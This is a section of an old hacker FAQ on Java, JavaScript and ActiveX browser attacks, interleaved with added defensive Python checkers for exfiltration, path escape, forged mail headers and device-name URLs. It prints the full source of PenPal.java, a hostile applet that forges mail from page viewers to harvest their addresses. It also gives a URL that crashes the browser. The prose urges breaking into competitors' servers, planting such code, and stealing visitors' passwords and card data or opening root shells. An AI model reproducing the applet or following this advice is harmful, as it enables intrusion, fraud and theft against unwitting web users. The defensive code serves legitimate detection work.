Fun with Java/JavaScript/ActiveX
Section 05: Fun with Java/JavaScript/ActiveX
05-1. What is a JavaScript Applet?
JavaScript is Netscape's way of allowing a server to send code via HTML directly to your browser. Since Java is built into Netscape, JavaScript "applets" can be constructed by simply including the text inside the HTML document. When someone accesses your page -- bingo! -- the code then uses Java and performs some function. They can work on 16-bit and 32-bit versions of a Web browser that supports Java, e.g. Netscape.
Also, if you have a Java compiler you can compile an applet and have the appropriate code in the HTML document and load it up to the browser. This approach is even better as you can use more features. This is typically supported in a 32-bit browser that supports Java. This means that a 16-bit version of Netscape (such as that for Windows 3.x or Macintosh) will not support it. There is no intention of anyone writing a 16-bit browser that supports Java applets.
05-2. What is the JavaScript problem?
By taking advantage of certain Java classes within Netscape, control is handed over to the applet, not the user. This can be done without the user even knowing it, and the applet can do some pretty nasty things. Here is a summary reported to the Best-of-Security mailing list (edited with my comments).
Denial of service attacks. Denial of service attacks can be moderated to degradation of service, possibly after a time delay, to make someone else's product look bad. They can also crash your browser. They include but are not limited to:
- Busy-wait to consume CPU cycles
- Allocate memory until no more is available
- Lock crucial system classes, e.g. java.net.InetAddress, which blocks all hostname lookups. Several other classes are suitable for this attack.
Covert Channels. This involves using the browser as a means to attack "inside" the firewall, without the user's knowledge. They include but are not limited to:
- Send mail via an SMTP port on server
- Lookup fictitious DNS name to send out info
- Tell browser to access fictitious URL (can be redirected back)
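As an added illustration (not part of the FAQ), here is a small Python checker that looks for two of the covert channels listed above in constructed firewall and resolver log lines: a workstation opening SMTP to something other than the site mail relay, and a DNS query whose leftmost label looks like encoded data. The log formats, the 10.0.0.x "internal" range and the relay address are assumptions made for the example.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample lines (assumed formats: an iptables-style firewall
# log and a generic resolver "query:" log), not taken from any product.
SAMPLE_LOG = """\
Mar 15 10:00:01 fw kernel: ACCEPT SRC=10.0.0.5 DST=203.0.113.7 PROTO=TCP DPT=80
Mar 15 10:00:02 fw kernel: ACCEPT SRC=10.0.0.5 DST=203.0.113.7 PROTO=TCP DPT=25
Mar 15 10:00:03 fw kernel: ACCEPT SRC=10.0.0.9 DST=10.0.0.2 PROTO=TCP DPT=25
Mar 15 10:00:04 ns named: query: www.example.net A from 10.0.0.5
Mar 15 10:00:05 ns named: query: c2VhcmNoPXBhc3N3b3JkJnVzZXI9Ym9i.collector.example A from 10.0.0.5
"""
# The last label is base64 for "search=password&user=bob": constructed to
# look like a browser history fragment smuggled out inside a DNS name.

INTERNAL_PREFIX = "10.0.0."   # assumption: workstation addresses
MAIL_RELAY = "10.0.0.2"       # assumption: the only host that should speak SMTP outbound
MAX_LABEL = 30                # longer leftmost labels are rare in legitimate names
ENCODED_LABEL = re.compile(r"^[A-Za-z0-9+/=_-]{20,}$")

FW_RE = re.compile(r"SRC=(\S+) DST=(\S+) PROTO=TCP DPT=(\d+)")
DNS_RE = re.compile(r"query: (\S+) \S+ from (\S+)")

Finding = Tuple[str, str, str]   # (rule, source host, detail)


def check_firewall_line(line: str) -> Optional[Finding]:
    """Flag a workstation opening port 25 anywhere except via the site mail relay."""
    m = FW_RE.search(line)
    if not m:
        return None
    src, dst, dport = m.group(1), m.group(2), int(m.group(3))
    if dport == 25 and src.startswith(INTERNAL_PREFIX) and MAIL_RELAY not in (src, dst):
        return ("smtp-from-workstation", src, dst)
    return None


def check_dns_line(line: str) -> Optional[Finding]:
    """Flag a query whose leftmost label is unusually long or base64-like."""
    m = DNS_RE.search(line)
    if not m:
        return None
    name, src = m.group(1), m.group(2)
    label = name.split(".")[0]
    if len(label) > MAX_LABEL or ENCODED_LABEL.match(label):
        return ("dns-exfil-suspect", src, name)
    return None


def scan(log: str) -> List[Finding]:
    """Run both checks over every line and collect the findings in order."""
    findings: List[Finding] = []
    for line in log.splitlines():
        for check in (check_firewall_line, check_dns_line):
            found = check(line)
            if found:
                findings.append(found)
    return findings


if __name__ == "__main__":
    for rule, src, detail in scan(SAMPLE_LOG):
        print(f"{rule}: {src} -> {detail}")
```

The SMTP rule is the more reliable of the two: a browser has no business opening port 25, so any hit is worth a look. The DNS rule is a heuristic and will need tuning per site (CDN hostnames can also carry long labels), but it is the same pattern that catches lookups of "fictitious" names used to carry data out.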
Information available to applets. What applets can look at system-wise:
- Can benchmark machine by reading system clock
- Java hashCode() defaults to the address of the object, which might leak some info
Implementation errors. Problems in Netscape's implementation of Java in the browser:
- DNS hack allowing connections to any machine (has been patched)
- Java disassembler (javap) has buffer overflows (not normally run by users)
Inter-Applet security. One applet can discover another and then manipulate the environment.
- Applets running from previous pages can learn of new applets by getting a handle to the top-level ThreadGroup and enumerating every thread running in the system.
- Can then call stop() and setPriority() on threads belonging to other applets, making them appear slow and unreliable.
Bytecode problem
The big one: the Java bytecode safety checker doesn't detect the illegality of
    constructor() {
        try { super(); } catch (Exception e) {}
    }
This is not legal in the language - super() must not be called in a try clause. But the bytecode checker erroneously allows it. This allows subclasses of privileged system classes to be created. Normally those classes throw an exception in their constructor so they can't be instantiated. But this trick allows it.
This way users can create their own ClassLoaders, SecurityManagers, etc. By creating a hacked ClassLoader the Java class type system can be defeated by resolving different classes against each other. Any non-static variable can be set, any public method can be called, including native methods. The security is gone.
Package name problem
If the first character of a package name is / the system will attempt to load code from an absolute path, which would be trusted since it comes from the local disk. Any Java class which the attacker can get onto the user's disk can then be loaded in trusted mode. Classes can be gotten onto disk simply by fetching URLs in Netscape, which puts them into its cache. If you can figure out Netscape's class naming scheme you can then run any class, trusted. (I think this one has been patched.)
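The package-name bug is a path-resolution mistake that any loader can make, not something specific to Java. The Python below is an added example, not Netscape's code: it shows the flawed resolution (os.path.join silently drops the trusted root when the name begins with /) beside a checked version that validates the name as dotted identifiers and confirms the result stays under the root. The root directory and class names are constructed.

```python
import os
import re

# A Java class name for our purposes: dotted identifiers only
# (simplified; an assumption made for this example).
CLASS_NAME = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")


def to_relative(class_name: str) -> str:
    """Map a.b.C to a/b/C.class, the usual on-disk layout."""
    return class_name.replace(".", "/") + ".class"


def resolve_naive(trusted_root: str, class_name: str) -> str:
    """The flawed pattern: no validation, and os.path.join discards trusted_root
    as soon as the second argument is absolute (starts with '/')."""
    return os.path.normpath(os.path.join(trusted_root, to_relative(class_name)))


def resolve_checked(trusted_root: str, class_name: str) -> str:
    """Hardened: reject anything that is not dotted identifiers, then confirm
    the resolved file still sits under the trusted root."""
    if not CLASS_NAME.match(class_name):
        raise ValueError(f"rejected class name: {class_name!r}")
    root = os.path.abspath(trusted_root)
    path = os.path.normpath(os.path.join(root, to_relative(class_name)))
    if os.path.commonpath([root, path]) != root:
        raise ValueError(f"resolved outside trusted root: {path}")
    return path


def is_accepted(trusted_root: str, class_name: str) -> bool:
    """True if the checked resolver accepts the name, False if it rejects it."""
    try:
        resolve_checked(trusted_root, class_name)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    root = "/opt/trusted/classes"   # constructed location of trusted code
    print(resolve_naive(root, "com.example.Foo"))
    print(resolve_naive(root, "/tmp/browser-cache/Evil"))   # escapes the root
    print(is_accepted(root, "com.example.Foo"), is_accepted(root, "/tmp/browser-cache/Evil"))
```

The second check (commonpath against the root) is belt-and-braces: the identifier regex already excludes "/" and "..", but keeping the containment test means a later relaxation of the name rules cannot quietly reopen the hole.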
What does all this mean? Not a whole lot, taken individually. But the clever hacker could start using these items in concert with other items listed in the FAQ and other simple hacking techniques. Of course only a fool would load this stuff up on their personal web page -- the best hack would be to compromise a competitor's server (if you're a business) or an enemy's home page. Then load the code into the page. Add meta keywords to your hacked page so when it is indexed by a spider, any web searches will lead innocent surfers to the page. Then simple things like this -- sending history and cache files (with any searches, passwords to other web pages, credit card info) through a remailer; to spawning a root shell for backdoor access; to collecting your arch rival's customers as they come to the rival's page, rendering it so slow as to crash customers' browsers (only after you've sent their e-mail address to yourself) -- all become possible.
05-3. What is an example of this "bad" Java code?
Here's an example freely available on the web. This should give you an idea.
/* PenPal.java by Mark D. LaDue */
/* March 15, 1996 */
/* Copyright (c) 1996 Mark D. LaDue
   You may study, use, modify, and distribute this example for any purpose.
   This example is provided WITHOUT WARRANTY either expressed or implied. */
/* This hostile applet forges an electronic mail letter from the person who
   views the applet in a browser to the person whose address appears in the
   string "toMe." The return address will be listed as
   penpal@my.hostile.applet. The appropriate commands to use for
   sendmail can often be found in the file /etc/mail/sendmail.hf.
   Note that while the person viewing the applet actually does initiate
   the mail by connecting (involuntarily) to port 25, the applet host's role
   in sending it is not so easily hidden. See the full header of any e-mail
   letter sent by the applet for more details. By putting your address
   in the string "toMe" and by scanning your incoming mail (with the
   included shell script or another of your own), you can get the full
   e-mail address, including the user name, of many people who view the
   applet. */

import java.applet.*;
import java.io.*;
import java.net.*;

public class PenPal extends java.applet.Applet implements Runnable {
    public static Socket socker;
    public static DataInputStream inner;
    public static PrintStream outer;
    public static int mailPort = 25;
    public static String mailFrom = "my.hostile.applet";
    public static String toMe = "mladue@math.gatech.edu"; // Change this please!
    public static String starter = new String();
    Thread controller = null;

    public void init() {
        // The applet sandbox only allows a connection back to the host the
        // applet was loaded from, so the mailer on that host is the target.
        try {
            socker = new Socket(getDocumentBase().getHost(), mailPort);
            inner = new DataInputStream(socker.getInputStream());
            outer = new PrintStream(socker.getOutputStream());
        }
        catch (IOException ioe) {}
    }

    public void start() {
        if (controller == null) {
            controller = new Thread(this);
            controller.setPriority(Thread.MAX_PRIORITY);
            controller.start();
        }
    }

    public void stop() {
        if (controller != null) {
            controller.stop();
            controller = null;
        }
    }

    public void run() {
        // Read the server greeting, then walk through a minimal SMTP dialogue.
        try {
            starter = inner.readLine();
        }
        catch (IOException ioe) {}
        mailMe("HELO " + mailFrom);
        mailMe("MAIL FROM: " + "penpal@" + mailFrom);
        mailMe("RCPT TO: " + toMe);
        mailMe("DATA");
        mailMe("Hey, it worked!" + "\n." + "\n");
        mailMe("QUIT");
        try {
            socker.close();
        }
        catch (IOException ioe) {}
    }

    public void mailMe(String toSend) {
        // Send one line and read (and discard) the server's reply.
        String response = new String();
        try {
            outer.println(toSend);
            outer.flush();
            response = inner.readLine();
        }
        catch(IOException e) {}
    }
}
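The comment at the top of PenPal points out that the applet host's part in the forgery shows up in the full header. The Python below is an added example, not LaDue's code or part of the FAQ: it walks the Received trail of a constructed message of the kind PenPal would produce, finds the earliest hop, and reports the IP that actually opened the SMTP connection together with the mailer that relayed it, next to the sender domain the envelope claimed. Hostnames, addresses and queue IDs in the sample are constructed.

```python
import re
from typing import Dict, List, Tuple

# Constructed message of the kind PenPal produces. The viewer's workstation
# (10.0.0.5) opened the SMTP session to the applet host's mailer
# (www.hostile.example), which relayed it on to the recipient's MX. Mail
# software prepends Received lines, so the newest hop is listed first.
# All names, addresses and queue IDs are made up for this example.
SAMPLE_MESSAGE = """\
Received: from www.hostile.example (www.hostile.example [203.0.113.7])
\tby mx.math.example (8.7.5) with ESMTP id AA1234
\tfor <mladue@math.example>; Fri, 15 Mar 1996 10:00:05 -0500
Received: from my.hostile.applet (viewer-pc.corp.example [10.0.0.5])
\tby www.hostile.example (8.7.5) with SMTP id AA0001;
\tFri, 15 Mar 1996 10:00:02 -0500
From: penpal@my.hostile.applet
To: mladue@math.example
Subject: Hey, it worked!

Hey, it worked!
"""

# sendmail-style clause: "from HELO-name (reverse-dns [ip]) by receiver"
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?P<rdns>[^\s\[]+)\s+\[(?P<ip>[\d.]+)\]\)\s+by\s+(?P<by>\S+)"
)

Hop = Tuple[str, str, str, str]   # (helo name, reverse dns, ip, receiving host)


def unfold_headers(raw: str) -> List[Tuple[str, str]]:
    """Split the header block into (name, value) pairs, joining folded lines."""
    head = raw.split("\n\n", 1)[0]
    lines: List[str] = []
    for line in head.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line)
    pairs = []
    for line in lines:
        name, _, value = line.partition(":")
        pairs.append((name.strip().lower(), value.strip()))
    return pairs


def received_chain(raw: str) -> List[Hop]:
    """Return the hops oldest-first, so the true origin is at index 0."""
    hops: List[Hop] = []
    for name, value in unfold_headers(raw):
        if name == "received":
            m = RECEIVED_RE.search(value)
            if m:
                hops.append((m["helo"], m["rdns"], m["ip"], m["by"]))
    hops.reverse()
    return hops


def analyse(raw: str) -> Dict[str, object]:
    """Compare what the sender claims with what the first hop recorded."""
    first = received_chain(raw)[0]
    sender = dict(unfold_headers(raw)).get("from", "")
    return {
        "claimed_sender_domain": sender.rsplit("@", 1)[-1],
        "helo_matches_rdns": first[0] == first[1],   # False here: the HELO name was forged
        "originating_ip": first[2],                  # the viewer's machine
        "originating_host": first[1],
        "submitting_mailer": first[3],               # the applet host
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_MESSAGE).items():
        print(f"{key}: {value}")
```

Two things stand out in the output: the HELO name "my.hostile.applet" does not match the reverse DNS of the connecting address, and the relaying mailer is the applet host itself. Either is enough for a recipient (or a mail filter) to tie the message back to the page that launched it.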
05-4. What about ActiveX?
ActiveX is Microsoft's answer to Netscape's plug-ins, allowing you to embed things into HTML pages to perform various tasks. But if you do something odd-ball, like have a page try to load a movie from the URL file:///aux, you will probably completely hang Internet Explorer and/or crash your computer.
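As an added example (not from the FAQ), here is a Python check a browser or plug-in could run before opening a file: URL: it rejects paths whose base name is a reserved DOS device name. The FAQ mentions only aux; this goes beyond it to the other names classic Windows reserves the same way (CON, PRN, NUL, COM1 to COM9, LPT1 to LPT9), and to the rule that an extension after the name does not change the outcome.

```python
from typing import Optional
from urllib.parse import unquote, urlparse

# Names classic Windows reserves for devices regardless of directory or
# extension (a fact about Windows; the FAQ itself names only aux).
RESERVED_DEVICES = (
    {"con", "prn", "aux", "nul"}
    | {f"com{i}" for i in range(1, 10)}
    | {f"lpt{i}" for i in range(1, 10)}
)


def device_name(path: str) -> Optional[str]:
    """Return the reserved device a path refers to, or None.
    Windows matches the base name before the first dot, case-insensitively,
    so both 'aux' and 'AUX.avi' name the device. Backslashes are accepted
    so the same check works on Windows-style paths."""
    base = path.replace("\\", "/").rstrip("/").rsplit("/", 1)[-1]
    stem = base.split(".", 1)[0].strip().lower()
    return stem if stem in RESERVED_DEVICES else None


def safe_file_url(url: str) -> bool:
    """True if the URL may be handed to a file loader; False if it names a device.
    Non-file schemes are out of scope here and pass through unchanged."""
    parts = urlparse(url)
    if parts.scheme.lower() != "file":
        return True
    # Decode percent-escapes first so file:///%41UX cannot slip past the check.
    return device_name(unquote(parts.path)) is None


if __name__ == "__main__":
    for url in ("file:///aux", "file:///C:/movies/AUX.avi",
                "file:///C:/movies/clip.avi", "http://example.com/aux"):
        verdict = "allowed" if safe_file_url(url) else "rejected (device name)"
        print(f"{url}: {verdict}")
```

The check is deliberately done on the decoded path and on the stem before the first dot, because those are the two places a naive filter is usually bypassed.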